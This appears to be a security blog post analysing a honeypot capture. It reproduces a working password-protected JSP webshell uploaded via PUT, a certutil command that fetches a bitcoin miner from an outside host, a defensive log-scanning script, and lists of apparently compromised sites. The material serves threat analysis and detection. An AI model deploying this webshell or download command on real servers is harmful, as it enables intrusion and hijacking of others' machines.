Glastopf, the web server honeypot, received a couple of generic probe attempts from 27.210.190.226, then immediately a PUT request for “/indexweb4.jsp/” (VirusTotal report) whose body was the following JSP:
<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%>
<%!public static String excuteCmd(String c)
{
StringBuilder line = new StringBuilder();
try
{
Process pro = Runtime.getRuntime().exec(c);
BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));
String temp = null;
while ((temp = buf.readLine()) != null)
{
line.append(temp+"\\n");
}
buf.close();
}
catch (Exception e)
{
line.append(e.getMessage());
}
return line.toString();
}
%>
<%
if("bala123".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd")))
{
out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");
}
else
{
out.println(":-)");
}
%>
Shortly afterwards, Glastopf registered a request to that JSP file:
/indexweb4.jsp?cmd=cmd.exe%20/c%20certutil.exe%20-urlcache%20-split%20-f%20hxxp://3389.space/nw/vm.exe%20c:/windows/inf/sst.exe&pwd=bala123
This would abuse certutil.exe to download an arbitrary file, in this case vm.exe from 3389.space, and write it to c:/windows/inf/sst.exe. Certutil is a Windows utility designed to help manage certificates, but it’s great at downloading files in a proxy-aware way. VirusTotal reports that vm.exe is a bitcoin miner.
Back in May, @sec_chick reported this behavior; at that time it was downloading a different EXE, another bitcoin miner.
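A defender-side triage script, added here as an example and not part of the original post: it scans web-server access-log lines for the two steps described above, a PUT that drops a .jsp and a query parameter carrying a certutil -urlcache download. The log lines, addresses and host names are constructed placeholders.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines modelled on the sequence the honeypot saw:
# a PUT that drops a JSP file, then a GET that drives it. IPs and hosts are
# placeholders, not the indicators from the post.
SAMPLE_LOG = """\
203.0.113.7 - - [01/Oct/2018:10:00:01 +0000] "GET /robots.txt HTTP/1.1" 404 -
203.0.113.7 - - [01/Oct/2018:10:00:02 +0000] "PUT /indexweb4.jsp/ HTTP/1.1" 201 -
203.0.113.7 - - [01/Oct/2018:10:00:05 +0000] "GET /indexweb4.jsp?cmd=cmd.exe%20/c%20certutil.exe%20-urlcache%20-split%20-f%20hxxp://example.invalid/nw/vm.exe%20c:/windows/inf/sst.exe&pwd=bala123 HTTP/1.1" 200 512
198.51.100.9 - - [01/Oct/2018:10:01:00 +0000] "GET /index.html HTTP/1.1" 200 1024
"""

# Common-log-format prefix: source IP, request method, request target, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')
# The download pattern from the post's request: certutil -urlcache ... -f <url> <dest>
CERTUTIL_RE = re.compile(r'certutil(\.exe)?\s+.*-urlcache\b.*-f\b', re.IGNORECASE)


def analyse_log(text):
    """Return a list of (source_ip, reason) findings for webshell-style activity."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, method, target, status = m.groups()
        parts = urlsplit(target)
        # 1. A PUT (or MOVE) that lands a JSP on disk; the trailing slash seen in
        #    the honeypot's PUT is stripped before checking the extension.
        if method in ("PUT", "MOVE") and parts.path.rstrip("/").lower().endswith(".jsp"):
            findings.append((ip, f"jsp upload via {method}: {parts.path}"))
        # 2. Any query parameter whose decoded value invokes certutil -urlcache.
        #    parse_qs already decodes once; unquote catches double-encoded values.
        for name, values in parse_qs(parts.query).items():
            for v in values:
                if CERTUTIL_RE.search(unquote(v)):
                    findings.append((ip, f"certutil download in param '{name}': {v}"))
    return findings


if __name__ == "__main__":
    for ip, reason in analyse_log(SAMPLE_LOG):
        print(ip, reason)
```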
Sites that seem to have been infected (search 776 indexweb4.jsp):
- hxxp://www.tongshengdianli.com/
- hxxp://74.208.15.120/
- hxxp://221.10.166.177/
- hxxp://114.255.185.211/
74.208.15.120 is in rough shape. Someone who used this same tool to exploit it has dropped a webshell in the top directory, along with a couple of pieces of malware titled pr.exe and cmd.exe.
Similarly, 221.10.166.177 has a ton of material dumped there by someone experimenting. Notably qdww5004.txt, which looks to be a webshell or similar, related to cnhonkerarmy. 114.255.185.211 has become someone’s repository of terrible executables; Chrome warns about it upon visiting.
Google finds other sites that seem to be affected, or previously affected. A surprising number redirect to hxxps://www.cjb.net/ now…
3389.space is a domain associated with other malicious campaigns:
- New Jenkins Campaign Hides Malware, Kills Competing Crypto-Miners
- Talos report related to 3389.space, similar to the above, but slightly broader
- A report on ss.exe, served from the domain
Other reports of similar “indexweb4.jsp” abuse:
- https://www.abuseipdb.com/check/112.226.252.84
- https://k-anz.hatenablog.com/entry/2018/07/15/102648 - someone who ended up writing a very similar article, back in September